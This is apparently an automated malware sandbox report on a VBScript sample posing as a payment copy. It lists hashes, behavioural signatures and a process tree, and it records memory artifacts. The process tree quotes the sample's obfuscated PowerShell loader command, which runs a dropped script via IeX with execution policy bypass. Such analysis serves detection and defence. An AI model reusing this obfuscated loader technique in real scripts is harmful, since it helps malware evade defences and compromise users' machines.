Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
18-11-2021 19:18
Static task
static1
Behavioral task
behavioral1
Sample
J3m1a_Payment_Copy.vbs
Resource
win7-en-20211014
General
-
Target
J3m1a_Payment_Copy.vbs
-
Size
2KB
-
MD5
69cb30fd3d94cfcc7c89a1f41a47d8dd
-
SHA1
5cc7c867d8b5238fa7ad4718c5ba5d105e72cd22
-
SHA256
6cb5a93eec2726f651d8a61a9e865d46a93324992d9a2467edb6b83b64789985
-
SHA512
02a96d4ecfda83233a557ac3cf94629ee251ed9ecef775bd697d371091c5c03fb48aacb4640770fdd9fd097f1cd118b62053c0f26183e08062ede68a6c4b8d5a
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 620 powershell.exe 524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 620 powershell.exe Token: SeDebugPrivilege 524 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 892 wrote to memory of 620 892 WScript.exe powershell.exe PID 892 wrote to memory of 620 892 WScript.exe powershell.exe PID 892 wrote to memory of 620 892 WScript.exe powershell.exe PID 620 wrote to memory of 524 620 powershell.exe powershell.exe PID 620 wrote to memory of 524 620 powershell.exe powershell.exe PID 620 wrote to memory of 524 620 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\J3m1a_Payment_Copy.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
8a3b2f5dd6c4dbe15c05c95d1901737d
SHA1360a38027ce3a0551dd6f699531dbeb9df522644
SHA256fba1e10505e01591f971d9b5f789643e1dd033ed7d5e8275cd0d7baf4d33d73b
SHA512c433ac6f240fc5188af02314475f901b73c683c6d08136393a3a1234cd8427d32830703e6e596b4ca2f55239406e114f746a0245649e2fe16bdbeb58066f7992
-
C:\Users\Public\Downloads\HBar.ps1MD5
337541d9757cb9a63d85337a2f1a4f27
SHA1377ed9d80c26e3d0f3d6f943fa773a3ff83fe242
SHA256867cca9a95ed015d4a227078782bf495af80c6101d0085eddcfe8aecc6284bef
SHA5129e98ac416efd807434386942b6f3fb938a384479a0703e89324b769053eaf72ecd609cc826f172227ad93e7efd5e90caeb0ebca939bbec53981244013bb31031
-
memory/524-66-0x000007FEF24B0000-0x000007FEF300D000-memory.dmpFilesize
11.4MB
-
memory/524-68-0x0000000002460000-0x0000000002462000-memory.dmpFilesize
8KB
-
memory/524-72-0x000000000246B000-0x000000000248A000-memory.dmpFilesize
124KB
-
memory/524-70-0x0000000002464000-0x0000000002467000-memory.dmpFilesize
12KB
-
memory/524-69-0x0000000002462000-0x0000000002464000-memory.dmpFilesize
8KB
-
memory/524-63-0x0000000000000000-mapping.dmp
-
memory/620-67-0x000000000283B000-0x000000000285A000-memory.dmpFilesize
124KB
-
memory/620-60-0x0000000002832000-0x0000000002834000-memory.dmpFilesize
8KB
-
memory/620-59-0x0000000002830000-0x0000000002832000-memory.dmpFilesize
8KB
-
memory/620-62-0x000000001B7C0000-0x000000001BABF000-memory.dmpFilesize
3.0MB
-
memory/620-58-0x000007FEF24B0000-0x000007FEF300D000-memory.dmpFilesize
11.4MB
-
memory/620-56-0x0000000000000000-mapping.dmp
-
memory/620-61-0x0000000002834000-0x0000000002837000-memory.dmpFilesize
12KB
-
memory/892-55-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmpFilesize
8KB